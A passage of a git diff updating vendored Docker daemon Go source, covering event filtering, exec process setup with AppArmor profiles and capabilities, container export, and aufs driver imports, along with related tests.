e.mu.Lock() if len(e.events) == cap(e.events) { // discard oldest event diff --git a/vendor/github.com/docker/docker/daemon/events/events_test.go b/vendor/github.com/docker/docker/daemon/events/events_test.go index bbd160f901..d11521567f 100644 --- a/vendor/github.com/docker/docker/daemon/events/events_test.go +++ b/vendor/github.com/docker/docker/daemon/events/events_test.go @@ -1,4 +1,4 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import ( "fmt" @@ -135,21 +135,28 @@ func TestLogEvents(t *testing.T) { t.Fatalf("Must be %d events, got %d", eventsLimit, len(current)) } first := current[0] - if first.Status != "action_16" { - t.Fatalf("First action is %s, must be action_16", first.Status) + + // TODO remove this once we removed the deprecated `ID`, `Status`, and `From` fields + if first.Action != first.Status { + // Verify that the (deprecated) Status is set to the expected value + t.Fatalf("Action (%s) does not match Status (%s)", first.Action, first.Status) + } + + if first.Action != "action_16" { + t.Fatalf("First action is %s, must be action_16", first.Action) } last := current[len(current)-1] - if last.Status != "action_79" { - t.Fatalf("Last action is %s, must be action_79", last.Status) + if last.Action != "action_271" { + t.Fatalf("Last action is %s, must be action_271", last.Action) } firstC := msgs[0] - if firstC.Status != "action_80" { - t.Fatalf("First action is %s, must be action_80", firstC.Status) + if firstC.Action != "action_272" { + t.Fatalf("First action is %s, must be action_272", firstC.Action) } lastC := msgs[len(msgs)-1] - if lastC.Status != "action_89" { - t.Fatalf("Last action is %s, must be action_89", lastC.Status) + if lastC.Action != "action_281" { + t.Fatalf("Last action is %s, must be action_281", lastC.Action) } } @@ -247,7 +254,7 @@ func TestLoadBufferedEventsOnlyFromPast(t *testing.T) { } // #13753 -func TestIngoreBufferedWhenNoTimes(t *testing.T) { +func TestIgnoreBufferedWhenNoTimes(t *testing.T) { m1, err := eventstestutils.Scan("2016-03-07T17:28:03.022433271+02:00 container die 0b863f2a26c18557fc6cdadda007c459f9ec81b874780808138aea78a3595079 (image=ubuntu, name=small_hoover)") if err != nil { t.Fatal(err) diff --git a/vendor/github.com/docker/docker/daemon/events/filter.go b/vendor/github.com/docker/docker/daemon/events/filter.go index 5c9c527692..da06f18b06 100644 --- a/vendor/github.com/docker/docker/daemon/events/filter.go +++ b/vendor/github.com/docker/docker/daemon/events/filter.go @@ -1,9 +1,9 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import ( + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/reference" ) // Filter can filter out docker events from a stream @@ -20,12 +20,17 @@ func NewFilter(filter filters.Args) *Filter { func (ef *Filter) Include(ev events.Message) bool { return ef.matchEvent(ev) && ef.filter.ExactMatch("type", ev.Type) && + ef.matchScope(ev.Scope) && ef.matchDaemon(ev) && ef.matchContainer(ev) && ef.matchPlugin(ev) && ef.matchVolume(ev) && ef.matchNetwork(ev) && ef.matchImage(ev) && + ef.matchNode(ev) && + ef.matchService(ev) && + ef.matchSecret(ev) && + ef.matchConfig(ev) && ef.matchLabels(ev.Actor.Attributes) } @@ -47,8 +52,15 @@ func (ef *Filter) filterContains(field string, values map[string]struct{}) bool return false } +func (ef *Filter) matchScope(scope string) bool { + if !ef.filter.Contains("scope") { + return true + } + return ef.filter.ExactMatch("scope", scope) +} + func (ef *Filter) matchLabels(attributes map[string]string) bool { - if !ef.filter.Include("label") { + if !ef.filter.Contains("label") { return true } return ef.filter.MatchKVList("label", attributes) @@ -74,6 +86,22 @@ func (ef *Filter) matchNetwork(ev events.Message) bool { return ef.fuzzyMatchName(ev, events.NetworkEventType) } +func (ef *Filter) matchService(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.ServiceEventType) +} + +func (ef *Filter) matchNode(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.NodeEventType) +} + +func (ef *Filter) matchSecret(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.SecretEventType) +} + +func (ef *Filter) matchConfig(ev events.Message) bool { + return ef.fuzzyMatchName(ev, events.ConfigEventType) +} + func (ef *Filter) fuzzyMatchName(ev events.Message, eventType string) bool { return ef.filter.FuzzyMatch(eventType, ev.Actor.ID) || ef.filter.FuzzyMatch(eventType, ev.Actor.Attributes["name"]) @@ -102,9 +130,9 @@ func (ef *Filter) matchImage(ev events.Message) bool { } func stripTag(image string) string { - ref, err := reference.ParseNamed(image) + ref, err := reference.ParseNormalizedNamed(image) if err != nil { return image } - return ref.Name() + return reference.FamiliarName(ref) } diff --git a/vendor/github.com/docker/docker/daemon/events/metrics.go b/vendor/github.com/docker/docker/daemon/events/metrics.go index c9a89ec0ed..199858d6e0 100644 --- a/vendor/github.com/docker/docker/daemon/events/metrics.go +++ b/vendor/github.com/docker/docker/daemon/events/metrics.go @@ -1,4 +1,4 @@ -package events +package events // import "github.com/docker/docker/daemon/events" import "github.com/docker/go-metrics" diff --git a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go index 3544446e18..b6766adb90 100644 --- a/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go +++ b/vendor/github.com/docker/docker/daemon/events/testutils/testutils.go @@ -1,4 +1,4 @@ -package testutils +package testutils // import "github.com/docker/docker/daemon/events/testutils" import ( "fmt" diff --git a/vendor/github.com/docker/docker/daemon/events_test.go b/vendor/github.com/docker/docker/daemon/events_test.go index 2dbcc27dfc..df089976f2 100644 --- a/vendor/github.com/docker/docker/daemon/events_test.go +++ b/vendor/github.com/docker/docker/daemon/events_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" @@ -16,15 +16,13 @@ func TestLogContainerEventCopyLabels(t *testing.T) { defer e.Evict(l) container := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Image: "image_name", - Labels: map[string]string{ - "node": "1", - "os": "alpine", - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Labels: map[string]string{ + "node": "1", + "os": "alpine", }, }, } @@ -49,14 +47,12 @@ func TestLogContainerEventWithAttributes(t *testing.T) { defer e.Evict(l) container := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Labels: map[string]string{ - "node": "1", - "os": "alpine", - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Labels: map[string]string{ + "node": "1", + "os": "alpine", }, }, } @@ -89,6 +85,6 @@ func validateTestAttributes(t *testing.T, l chan interface{}, expectedAttributes } } case <-time.After(10 * time.Second): - t.Fatalf("LogEvent test timed out") + t.Fatal("LogEvent test timed out") } } diff --git a/vendor/github.com/docker/docker/daemon/exec.go b/vendor/github.com/docker/docker/daemon/exec.go index 8197426a33..f0b43d7253 100644 --- a/vendor/github.com/docker/docker/daemon/exec.go +++ b/vendor/github.com/docker/docker/daemon/exec.go @@ -1,24 +1,24 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( + "context" "fmt" "io" "strings" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/errors" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/container" + "github.com/docker/docker/container/stream" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/pools" "github.com/docker/docker/pkg/signal" "github.com/docker/docker/pkg/term" - "github.com/docker/docker/utils" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Seconds to wait after sending TERM before trying KILL @@ -44,34 +44,34 @@ func (d *Daemon) ExecExists(name string) (bool, error) { // with the exec instance is stopped or paused, it will return an error. func (d *Daemon) getExecConfig(name string) (*exec.Config, error) { ec := d.execCommands.Get(name) + if ec == nil { + return nil, errExecNotFound(name) + } // If the exec is found but its container is not in the daemon's list of // containers then it must have been deleted, in which case instead of // saying the container isn't running, we should return a 404 so that // the user sees the same error now that they will after the // 5 minute clean-up loop is run which erases old/dead execs. - - if ec != nil { - if container := d.containers.Get(ec.ContainerID); container != nil { - if !container.IsRunning() { - return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String()) - } - if container.IsPaused() { - return nil, errExecPaused(container.ID) - } - if container.IsRestarting() { - return nil, errContainerIsRestarting(container.ID) - } - return ec, nil - } + container := d.containers.Get(ec.ContainerID) + if container == nil { + return nil, containerNotFound(name) } - - return nil, errExecNotFound(name) + if !container.IsRunning() { + return nil, fmt.Errorf("Container %s is not running: %s", container.ID, container.State.String()) + } + if container.IsPaused() { + return nil, errExecPaused(container.ID) + } + if container.IsRestarting() { + return nil, errContainerIsRestarting(container.ID) + } + return ec, nil } func (d *Daemon) unregisterExecCommand(container *container.Container, execConfig *exec.Config) { - container.ExecCommands.Delete(execConfig.ID) - d.execCommands.Delete(execConfig.ID) + container.ExecCommands.Delete(execConfig.ID, execConfig.Pid) + d.execCommands.Delete(execConfig.ID, execConfig.Pid) } func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { @@ -81,7 +81,7 @@ func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { } if !container.IsRunning() { - return nil, errNotRunning{container.ID} + return nil, errNotRunning(container.ID) } if container.IsPaused() { return nil, errExecPaused(name) @@ -94,7 +94,7 @@ func (d *Daemon) getActiveContainer(name string) (*container.Container, error) { // ContainerExecCreate sets up an exec in a running container. func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (string, error) { - container, err := d.getActiveContainer(name) + cntr, err := d.getActiveContainer(name) if err != nil { return "", err } @@ -115,26 +115,33 @@ func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (str execConfig.OpenStdin = config.AttachStdin execConfig.OpenStdout = config.AttachStdout execConfig.OpenStderr = config.AttachStderr - execConfig.ContainerID = container.ID + execConfig.ContainerID = cntr.ID execConfig.DetachKeys = keys execConfig.Entrypoint = entrypoint execConfig.Args = args execConfig.Tty = config.Tty execConfig.Privileged = config.Privileged execConfig.User = config.User + execConfig.WorkingDir = config.WorkingDir - linkedEnv, err := d.setupLinkedContainers(container) + linkedEnv, err := d.setupLinkedContainers(cntr) if err != nil { return "", err } - execConfig.Env = utils.ReplaceOrAppendEnvValues(container.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env) + execConfig.Env = container.ReplaceOrAppendEnvValues(cntr.CreateDaemonEnvironment(config.Tty, linkedEnv), config.Env) if len(execConfig.User) == 0 { - execConfig.User = container.Config.User + execConfig.User = cntr.Config.User + } + if len(execConfig.WorkingDir) == 0 { + execConfig.WorkingDir = cntr.Config.WorkingDir } - d.registerExecCommand(container, execConfig) + d.registerExecCommand(cntr, execConfig) - d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + attributes := map[string]string{ + "execID": execConfig.ID, + } + d.LogContainerEventWithAttributes(cntr, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "), attributes) return execConfig.ID, nil } @@ -142,7 +149,7 @@ func (d *Daemon) ContainerExecCreate(name string, config *types.ExecConfig) (str // ContainerExecStart starts a previously set up exec instance. The // std streams are set up. // If ctx is cancelled, the process is terminated. -func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.ReadCloser, stdout io.Writer, stderr io.Writer) (err error) { +func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.Reader, stdout io.Writer, stderr io.Writer) (err error) { var ( cStdin io.ReadCloser cStdout, cStderr io.Writer @@ -157,26 +164,36 @@ func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.R if ec.ExitCode != nil { ec.Unlock() err := fmt.Errorf("Error: Exec command %s has already run", ec.ID) - return errors.NewRequestConflictError(err) + return errdefs.Conflict(err) } if ec.Running { ec.Unlock() - return fmt.Errorf("Error: Exec command %s is already running", ec.ID) + return errdefs.Conflict(fmt.Errorf("Error: Exec command %s is already running", ec.ID)) } ec.Running = true + ec.Unlock() + + c := d.containers.Get(ec.ContainerID) + logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID) + attributes := map[string]string{ + "execID": ec.ID, + } + d.LogContainerEventWithAttributes(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " "), attributes) + defer func() { if err != nil { + ec.Lock() ec.Running = false exitCode := 126 ec.ExitCode = &exitCode + if err := ec.CloseStreams(); err != nil { + logrus.Errorf("failed to cleanup exec %s streams: %s", c.ID, err) + } + ec.Unlock() + c.ExecCommands.Delete(ec.ID, ec.Pid) } }() - ec.Unlock() - - c := d.containers.Get(ec.ContainerID) - logrus.Debugf("starting exec command %s in container %s", ec.ID, c.ID) - d.LogContainerEvent(c, "exec_start: "+ec.Entrypoint+" "+strings.Join(ec.Args, " ")) if ec.OpenStdin && stdin != nil { r, w := io.Pipe() @@ -200,44 +217,71 @@ func (d *Daemon) ContainerExecStart(ctx context.Context, name string, stdin io.R ec.StreamConfig.NewNopInputPipe() } - p := libcontainerd.Process{ + p := &specs.Process{ Args: append([]string{ec.Entrypoint}, ec.Args...), Env: ec.Env, Terminal: ec.Tty, + Cwd: ec.WorkingDir, + } + if p.Cwd == "" { + p.Cwd = "/" } - if err := execSetPlatformOpt(c, ec, &p); err != nil { + if err := d.execSetPlatformOpt(c, ec, p); err != nil { return err } - attachErr := container.AttachStreams(ctx, ec.StreamConfig, ec.OpenStdin, true, ec.Tty, cStdin, cStdout, cStderr, ec.DetachKeys) + attachConfig := stream.AttachConfig{ + TTY: ec.Tty, + UseStdin: cStdin != nil, + UseStdout: cStdout != nil, + UseStderr: cStderr != nil, + Stdin: cStdin, + Stdout: cStdout, + Stderr: cStderr, + DetachKeys: ec.DetachKeys, + CloseStdin: true, + } + ec.StreamConfig.AttachStreams(&attachConfig) + attachErr := ec.StreamConfig.CopyStreams(ctx, &attachConfig) - systemPid, err := d.containerd.AddProcess(ctx, c.ID, name, p, ec.InitializeStdio) + // Synchronize with libcontainerd event loop + ec.Lock() + c.ExecCommands.Lock() + systemPid, err := d.containerd.Exec(ctx, c.ID, ec.ID, p, cStdin != nil, ec.InitializeStdio) + // the exec context should be ready, or error happened. + // close the chan to notify readiness + close(ec.Started) if err != nil { - return err + c.ExecCommands.Unlock() + ec.Unlock() + return translateContainerdStartErr(ec.Entrypoint, ec.SetExitCode, err) } - ec.Lock() ec.Pid = systemPid + c.ExecCommands.Unlock() ec.Unlock() select { case <-ctx.Done(): logrus.Debugf("Sending TERM signal to process %v in container %v", name, c.ID) - d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["TERM"])) + d.containerd.SignalProcess(ctx, c.ID, name, int(signal.SignalMap["TERM"])) select { case <-time.After(termProcessTimeout * time.Second): logrus.Infof("Container %v, process %v failed to exit within %d seconds of signal TERM - using the force", c.ID, name, termProcessTimeout) - d.containerd.SignalProcess(c.ID, name, int(signal.SignalMap["KILL"])) + d.containerd.SignalProcess(ctx, c.ID, name, int(signal.SignalMap["KILL"])) case <-attachErr: // TERM signal worked } - return fmt.Errorf("context cancelled") + return ctx.Err() case err := <-attachErr: if err != nil { - if _, ok := err.(container.DetachError); !ok { - return fmt.Errorf("exec attach failed with error: %v", err) + if _, ok := err.(term.EscapeError); !ok { + return errdefs.System(errors.Wrap(err, "exec attach failed")) + } + attributes := map[string]string{ + "execID": ec.ID, } - d.LogContainerEvent(c, "exec_detach") + d.LogContainerEventWithAttributes(c, "exec_detach", attributes) } } return nil @@ -254,7 +298,7 @@ func (d *Daemon) execCommandGC() { for id, config := range d.execCommands.Commands() { if config.CanRemove { cleaned++ - d.execCommands.Delete(id) + d.execCommands.Delete(id, config.Pid) } else { if _, exists := liveExecCommands[id]; !exists { config.CanRemove = true diff --git a/vendor/github.com/docker/docker/daemon/exec/exec.go b/vendor/github.com/docker/docker/daemon/exec/exec.go index 933136f965..c036c46a0c 100644 --- a/vendor/github.com/docker/docker/daemon/exec/exec.go +++ b/vendor/github.com/docker/docker/daemon/exec/exec.go @@ -1,13 +1,13 @@ -package exec +package exec // import "github.com/docker/docker/daemon/exec" import ( "runtime" "sync" - "github.com/Sirupsen/logrus" + "github.com/containerd/containerd/cio" "github.com/docker/docker/container/stream" - "github.com/docker/docker/libcontainerd" "github.com/docker/docker/pkg/stringid" + "github.com/sirupsen/logrus" ) // Config holds the configurations for execs. The Daemon keeps @@ -15,6 +15,7 @@ import ( // examined both during and after completion. type Config struct { sync.Mutex + Started chan struct{} StreamConfig *stream.Config ID string Running bool @@ -30,6 +31,7 @@ type Config struct { Tty bool Privileged bool User string + WorkingDir string Env []string Pid int } @@ -39,11 +41,30 @@ func NewConfig() *Config { return &Config{ ID: stringid.GenerateNonCryptoID(), StreamConfig: stream.NewConfig(), + Started: make(chan struct{}), } } +type rio struct { + cio.IO + + sc *stream.Config +} + +func (i *rio) Close() error { + i.IO.Close() + + return i.sc.CloseStreams() +} + +func (i *rio) Wait() { + i.sc.Wait() + + i.IO.Wait() +} + // InitializeStdio is called by libcontainerd to connect the stdio. -func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error { +func (c *Config) InitializeStdio(iop *cio.DirectIO) (cio.IO, error) { c.StreamConfig.CopyToPipe(iop) if c.StreamConfig.Stdin() == nil && !c.Tty && runtime.GOOS == "windows" { @@ -54,7 +75,7 @@ func (c *Config) InitializeStdio(iop libcontainerd.IOPipe) error { } } - return nil + return &rio{IO: iop, sc: c.StreamConfig}, nil } // CloseStreams closes the stdio streams for the exec @@ -62,47 +83,54 @@ func (c *Config) CloseStreams() error { return c.StreamConfig.CloseStreams() } +// SetExitCode sets the exec config's exit code +func (c *Config) SetExitCode(code int) { + c.ExitCode = &code +} + // Store keeps track of the exec configurations. type Store struct { - commands map[string]*Config + byID map[string]*Config sync.RWMutex } // NewStore initializes a new exec store. func NewStore() *Store { - return &Store{commands: make(map[string]*Config, 0)} + return &Store{ + byID: make(map[string]*Config), + } } // Commands returns the exec configurations in the store. func (e *Store) Commands() map[string]*Config { e.RLock() - commands := make(map[string]*Config, len(e.commands)) - for id, config := range e.commands { - commands[id] = config + byID := make(map[string]*Config, len(e.byID)) + for id, config := range e.byID { + byID[id] = config } e.RUnlock() - return commands + return byID } // Add adds a new exec configuration to the store. func (e *Store) Add(id string, Config *Config) { e.Lock() - e.commands[id] = Config + e.byID[id] = Config e.Unlock() } // Get returns an exec configuration by its id. func (e *Store) Get(id string) *Config { e.RLock() - res := e.commands[id] + res := e.byID[id] e.RUnlock() return res } // Delete removes an exec configuration from the store. -func (e *Store) Delete(id string) { +func (e *Store) Delete(id string, pid int) { e.Lock() - delete(e.commands, id) + delete(e.byID, id) e.Unlock() } @@ -110,7 +138,7 @@ func (e *Store) Delete(id string) { func (e *Store) List() []string { var IDs []string e.RLock() - for id := range e.commands { + for id := range e.byID { IDs = append(IDs, id) } e.RUnlock() diff --git a/vendor/github.com/docker/docker/daemon/exec_linux.go b/vendor/github.com/docker/docker/daemon/exec_linux.go index 5aeedc3470..cd52f4886f 100644 --- a/vendor/github.com/docker/docker/daemon/exec_linux.go +++ b/vendor/github.com/docker/docker/daemon/exec_linux.go @@ -1,27 +1,59 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/container" "github.com/docker/docker/daemon/caps" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" + "github.com/opencontainers/runc/libcontainer/apparmor" "github.com/opencontainers/runtime-spec/specs-go" ) -func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { +func (daemon *Daemon) execSetPlatformOpt(c *container.Container, ec *exec.Config, p *specs.Process) error { if len(ec.User) > 0 { uid, gid, additionalGids, err := getUser(c, ec.User) if err != nil { return err } - p.User = &specs.User{ + p.User = specs.User{ UID: uid, GID: gid, AdditionalGids: additionalGids, } } if ec.Privileged { - p.Capabilities = caps.GetAllCapabilities() + if p.Capabilities == nil { + p.Capabilities = &specs.LinuxCapabilities{} + } + p.Capabilities.Bounding = caps.GetAllCapabilities() + p.Capabilities.Permitted = p.Capabilities.Bounding + p.Capabilities.Inheritable = p.Capabilities.Bounding + p.Capabilities.Effective = p.Capabilities.Bounding + } + if apparmor.IsEnabled() { + var appArmorProfile string + if c.AppArmorProfile != "" { + appArmorProfile = c.AppArmorProfile + } else if c.HostConfig.Privileged { + // `docker exec --privileged` does not currently disable AppArmor + // profiles. Privileged configuration of the container is inherited + appArmorProfile = "unconfined" + } else { + appArmorProfile = "docker-default" + } + + if appArmorProfile == "docker-default" { + // Unattended upgrades and other fun services can unload AppArmor + // profiles inadvertently. Since we cannot store our profile in + // /etc/apparmor.d, nor can we practically add other ways of + // telling the system to keep our profile loaded, in order to make + // sure that we keep the default profile enabled we dynamically + // reload it if necessary. + if err := ensureDefaultAppArmorProfile(); err != nil { + return err + } + } + p.ApparmorProfile = appArmorProfile } + daemon.setRlimits(&specs.Spec{Process: p}, c) return nil } diff --git a/vendor/github.com/docker/docker/daemon/exec_linux_test.go b/vendor/github.com/docker/docker/daemon/exec_linux_test.go new file mode 100644 index 0000000000..0db7f080db --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/exec_linux_test.go @@ -0,0 +1,53 @@ +// +build linux + +package daemon + +import ( + "testing" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/exec" + "github.com/opencontainers/runc/libcontainer/apparmor" + "github.com/opencontainers/runtime-spec/specs-go" + "gotest.tools/assert" +) + +func TestExecSetPlatformOpt(t *testing.T) { + if !apparmor.IsEnabled() { + t.Skip("requires AppArmor to be enabled") + } + d := &Daemon{} + c := &container.Container{AppArmorProfile: "my-custom-profile"} + ec := &exec.Config{} + p := &specs.Process{} + + err := d.execSetPlatformOpt(c, ec, p) + assert.NilError(t, err) + assert.Equal(t, "my-custom-profile", p.ApparmorProfile) +} + +// TestExecSetPlatformOptPrivileged verifies that `docker exec --privileged` +// does not disable AppArmor profiles. Exec currently inherits the `Privileged` +// configuration of the container. See https://github.com/moby/moby/pull/31773#discussion_r105586900 +// +// This behavior may change in future, but test for the behavior to prevent it +// from being changed accidentally. +func TestExecSetPlatformOptPrivileged(t *testing.T) { + if !apparmor.IsEnabled() { + t.Skip("requires AppArmor to be enabled") + } + d := &Daemon{} + c := &container.Container{AppArmorProfile: "my-custom-profile"} + ec := &exec.Config{Privileged: true} + p := &specs.Process{} + + err := d.execSetPlatformOpt(c, ec, p) + assert.NilError(t, err) + assert.Equal(t, "my-custom-profile", p.ApparmorProfile) + + c.HostConfig = &containertypes.HostConfig{Privileged: true} + err = d.execSetPlatformOpt(c, ec, p) + assert.NilError(t, err) + assert.Equal(t, "unconfined", p.ApparmorProfile) +} diff --git a/vendor/github.com/docker/docker/daemon/exec_solaris.go b/vendor/github.com/docker/docker/daemon/exec_solaris.go deleted file mode 100644 index 7003355d91..0000000000 --- a/vendor/github.com/docker/docker/daemon/exec_solaris.go +++ /dev/null @@ -1,11 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/container" - "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" -) - -func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { - return nil -} diff --git a/vendor/github.com/docker/docker/daemon/exec_windows.go b/vendor/github.com/docker/docker/daemon/exec_windows.go index 1d6974cda9..c37ea9f31a 100644 --- a/vendor/github.com/docker/docker/daemon/exec_windows.go +++ b/vendor/github.com/docker/docker/daemon/exec_windows.go @@ -1,14 +1,16 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "github.com/docker/docker/container" "github.com/docker/docker/daemon/exec" - "github.com/docker/docker/libcontainerd" + specs "github.com/opencontainers/runtime-spec/specs-go" ) -func execSetPlatformOpt(c *container.Container, ec *exec.Config, p *libcontainerd.Process) error { +func (daemon *Daemon) execSetPlatformOpt(c *container.Container, ec *exec.Config, p *specs.Process) error { // Process arguments need to be escaped before sending to OCI. - p.Args = escapeArgs(p.Args) - p.User.Username = ec.User + if c.OS == "windows" { + p.Args = escapeArgs(p.Args) + p.User.Username = ec.User + } return nil } diff --git a/vendor/github.com/docker/docker/daemon/export.go b/vendor/github.com/docker/docker/daemon/export.go index 5ef6dbb0e5..737e161edc 100644 --- a/vendor/github.com/docker/docker/daemon/export.go +++ b/vendor/github.com/docker/docker/daemon/export.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "fmt" @@ -6,22 +6,34 @@ import ( "runtime" "github.com/docker/docker/container" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/system" ) // ContainerExport writes the contents of the container to the given // writer. An error is returned if the container cannot be found. func (daemon *Daemon) ContainerExport(name string, out io.Writer) error { - if runtime.GOOS == "windows" { - return fmt.Errorf("the daemon on this platform does not support export of a container") - } - container, err := daemon.GetContainer(name) if err != nil { return err } + if runtime.GOOS == "windows" && container.OS == "windows" { + return fmt.Errorf("the daemon on this operating system does not support exporting Windows containers") + } + + if container.IsDead() { + err := fmt.Errorf("You cannot export container %s which is Dead", container.ID) + return errdefs.Conflict(err) + } + + if container.IsRemovalInProgress() { + err := fmt.Errorf("You cannot export container %s which is being removed", container.ID) + return errdefs.Conflict(err) + } + data, err := daemon.containerExport(container) if err != nil { return fmt.Errorf("Error exporting container %s: %v", name, err) @@ -35,24 +47,38 @@ func (daemon *Daemon) ContainerExport(name string, out io.Writer) error { return nil } -func (daemon *Daemon) containerExport(container *container.Container) (io.ReadCloser, error) { - if err := daemon.Mount(container); err != nil { +func (daemon *Daemon) containerExport(container *container.Container) (arch io.ReadCloser, err error) { + if !system.IsOSSupported(container.OS) { + return nil, fmt.Errorf("cannot export %s: %s ", container.ID, system.ErrNotSupportedOperatingSystem) + } + rwlayer, err := daemon.imageService.GetLayerByID(container.ID, container.OS) + if err != nil { + return nil, err + } + defer func() { + if err != nil { + daemon.imageService.ReleaseLayer(rwlayer, container.OS) + } + }() + + basefs, err := rwlayer.Mount(container.GetMountLabel()) + if err != nil { return nil, err } - uidMaps, gidMaps := daemon.GetUIDGIDMaps() - archive, err := archive.TarWithOptions(container.BaseFS, &archive.TarOptions{ + archive, err := archivePath(basefs, basefs.Path(), &archive.TarOptions{ Compression: archive.Uncompressed, - UIDMaps: uidMaps, - GIDMaps: gidMaps, + UIDMaps: daemon.idMappings.UIDs(), + GIDMaps: daemon.idMappings.GIDs(), }) if err != nil { - daemon.Unmount(container) + rwlayer.Unmount() return nil, err } - arch := ioutils.NewReadCloserWrapper(archive, func() error { + arch = ioutils.NewReadCloserWrapper(archive, func() error { err := archive.Close() - daemon.Unmount(container) + rwlayer.Unmount() + daemon.imageService.ReleaseLayer(rwlayer, container.OS) return err }) daemon.LogContainerEvent(container, "export") diff --git a/vendor/github.com/docker/docker/daemon/getsize_unix.go b/vendor/github.com/docker/docker/daemon/getsize_unix.go deleted file mode 100644 index 707323a4bf..0000000000 --- a/vendor/github.com/docker/docker/daemon/getsize_unix.go +++ /dev/null @@ -1,41 +0,0 @@ -// +build linux freebsd solaris - -package daemon - -import ( - "github.com/Sirupsen/logrus" - "github.com/docker/docker/container" -) - -// getSize returns the real size & virtual size of the container. -func (daemon *Daemon) getSize(container *container.Container) (int64, int64) { - var ( - sizeRw, sizeRootfs int64 - err error - ) - - if err := daemon.Mount(container); err != nil { - logrus.Errorf("Failed to compute size of container rootfs %s: %s", container.ID, err) - return sizeRw, sizeRootfs - } - defer daemon.Unmount(container) - - sizeRw, err = container.RWLayer.Size() - if err != nil { - logrus.Errorf("Driver %s couldn't return diff size of container %s: %s", - daemon.GraphDriverName(), container.ID, err) - // FIXME: GetSize should return an error. Not changing it now in case - // there is a side-effect. - sizeRw = -1 - } - - if parent := container.RWLayer.Parent(); parent != nil { - sizeRootfs, err = parent.Size() - if err != nil { - sizeRootfs = -1 - } else if sizeRw != -1 { - sizeRootfs += sizeRw - } - } - return sizeRw, sizeRootfs -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go index ec55ea4cde..9152252770 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/aufs/aufs.go @@ -20,10 +20,11 @@ aufs driver directory structure */ -package aufs +package aufs // import "github.com/docker/docker/daemon/graphdriver/aufs" import ( "bufio" + "context" "fmt" "io" "io/ioutil" @@ -33,21 +34,23 @@ import ( "path/filepath" "strings" "sync" - "syscall" "time" - "github.com/Sirupsen/logrus" - "github.com/vbatts/tar-split/tar/storage" - "github.com/docker/docker/daemon/graphdriver" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/directory" "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/locker" mountpk "github.com/docker/docker/pkg/mount" - - "github.com/opencontainers/runc/libcontainer/label" + "github.com/docker/docker/pkg/system" rsystem "github.com/opencontainers/runc/libcontainer/system" + "github.com/opencontainers/selinux/go-selinux/label" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" + "github.com/vbatts/tar-split/tar/storage" + "golang.org/x/sys/unix" ) var ( @@ -59,6 +62,8 @@ var ( enableDirpermLock sync.Once enableDirperm bool + + logger = logrus.WithField("storage-driver", "aufs") ) func init() { @@ -75,18 +80,28 @@ type Driver struct { pathCacheLock sync.Mutex pathCache map[string]string naiveDiff graphdriver.DiffDriver + locker *locker.Locker } // Init returns a new AUFS driver. // An error is returned if AUFS is not supported. func Init(root string, options []string, 